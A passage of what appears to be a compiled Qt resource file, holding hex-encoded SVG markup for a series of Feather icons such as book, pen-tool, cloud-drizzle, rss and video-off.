\x20\x31\x35\x2e\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\
\x32\x3d\x22\x38\x2e\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x59\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x6f\x6f\x6b\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x39\x2e\
\x35\x41\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\x20\x31\x20\
\x36\x2e\x35\x20\x31\x37\x48\x32\x30\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x2e\x35\x20\
\x32\x48\x32\x30\x76\x32\x30\x48\x36\x2e\x35\x41\x32\x2e\x35\x20\
\x32\x2e\x35\x20\x30\x20\x30\x20\x31\x20\x34\x20\x31\x39\x2e\x35\
\x76\x2d\x31\x35\x41\x32\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x30\
\x20\x31\x20\x36\x2e\x35\x20\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x68\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x64\x6f\x77\x6e\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\
\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\
\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\
\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x20\x31\x32\x20\x31\x32\x20\
\x31\x36\x20\x31\x36\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x87\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x65\x6e\x2d\x74\
\x6f\x6f\x6c\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x32\x20\x31\x39\x6c\x37\x2d\x37\x20\x33\x20\x33\x2d\x37\x20\x37\
\x2d\x33\x2d\x33\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x31\x33\x6c\x2d\x31\
\x2e\x35\x2d\x37\x2e\x35\x4c\x32\x20\x32\x6c\x33\x2e\x35\x20\x31\
\x34\x2e\x35\x4c\x31\x33\x20\x31\x38\x6c\x35\x2d\x35\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x20\x32\x6c\x37\x2e\x35\x38\x36\x20\x37\x2e\x35\x38\x36\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x31\x22\x20\x63\x79\x3d\x22\x31\x31\x22\
\x20\x72\x3d\x22\x32\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x2d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x64\x72\x69\x7a\x7a\x6c\x65\x22\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x39\x22\x20\x78\
\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\
\x22\x20\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x38\x22\
\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\
\x3d\x22\x31\x39\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\
\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\x3d\x22\x31\
\x33\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\
\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x31\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\
\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\
\x20\x31\x36\x2e\x35\x38\x41\x35\x20\x35\x20\x30\x20\x30\x20\x30\
\x20\x31\x38\x20\x37\x68\x2d\x31\x2e\x32\x36\x41\x38\x20\x38\x20\
\x30\x20\x31\x20\x30\x20\x34\x20\x31\x35\x2e\x32\x35\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x59\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x63\x6b\
\x2d\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\x20\x31\x31\x20\
\x31\x32\x20\x31\x34\x20\x32\x32\x20\x34\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x31\x20\x31\x32\x76\x37\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x2d\x32\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2d\x32\x68\x31\x31\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x72\x6e\x65\
\x72\x2d\x75\x70\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x35\
\x20\x31\x34\x20\x32\x30\x20\x39\x20\x31\x35\x20\x34\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x34\x20\x32\x30\x76\x2d\x37\x61\x34\x20\x34\x20\
\x30\x20\x30\x20\x31\x20\x34\x2d\x34\x68\x31\x32\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x61\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x72\x2d\x63\
\x68\x61\x72\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\x22\
\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\x38\x22\
\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\
\x32\x30\x22\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\
\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x4b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x69\x6d\
\x69\x7a\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x38\
\x20\x33\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x20\x32\x48\x33\x6d\x31\x38\x20\x30\x68\x2d\x33\x61\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x33\x6d\x30\x20\x31\
\x38\x76\x2d\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x2d\x32\x68\x33\x4d\x33\x20\x31\x36\x68\x33\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\x33\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x73\x73\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x31\x61\x39\
\x20\x39\x20\x30\x20\x30\x20\x31\x20\x39\x20\x39\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\
\x20\x34\x61\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x31\x20\x31\
\x36\x20\x31\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\
\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x35\x22\x20\x63\x79\x3d\x22\
\x31\x39\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\
\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x7b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x69\x64\x65\x6f\
\x2d\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x36\x20\x31\x36\x76\x31\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x48\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2d\x32\x56\x37\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x2d\x32\x68\x32\x6d\x35\x2e\x36\x36\x20\x30\x48\x31\
\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\
\x33\x2e\x33\x34\x6c\x31\x20\x31\x4c\x32\x33\x20\x37\x76\x31\x30\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x75\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x65\x6c\x6c\
\x6f\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\
\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x37\x22\x20\x79\x3d\x22\
\x37\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x22\x20\x68\x65\x69\
\x67\x68\x74\x3d\x22\x39\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\
\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x34\x22\x20\x79\x3d\x22\x37\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x35\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
